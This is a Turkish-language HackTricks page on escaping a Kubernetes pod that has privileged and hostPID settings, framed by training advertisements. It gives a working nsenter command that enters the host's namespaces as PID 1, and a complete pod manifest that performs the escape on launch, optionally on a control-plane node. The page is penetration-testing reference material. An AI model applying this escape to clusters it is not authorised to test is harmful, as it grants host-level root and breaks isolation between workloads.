Pod Kaçış Yetkileri

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

Yetkili ve hostPID

Bu yetkilerle host’un süreçlerine erişiminiz olacak ve host süreçlerinden birinin ad alanına girmek için yeterli yetkilere sahip olacaksınız.
Yetkili olmanıza gerek olmayabileceğini, sadece bazı yeteneklere ve diğer potansiyel savunma aşmalarına (örneğin apparmor ve/veya seccomp) ihtiyacınız olabileceğini unutmayın.

Aşağıdaki gibi bir şey çalıştırmak, pod’dan kaçmanıza izin verecektir:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Yapılandırma örneği:

apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command:
[
"nsenter",
"--target",
"1",
"--mount",
"--uts",
"--ipc",
"--net",
"--pid",
"--",
"bash",
]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin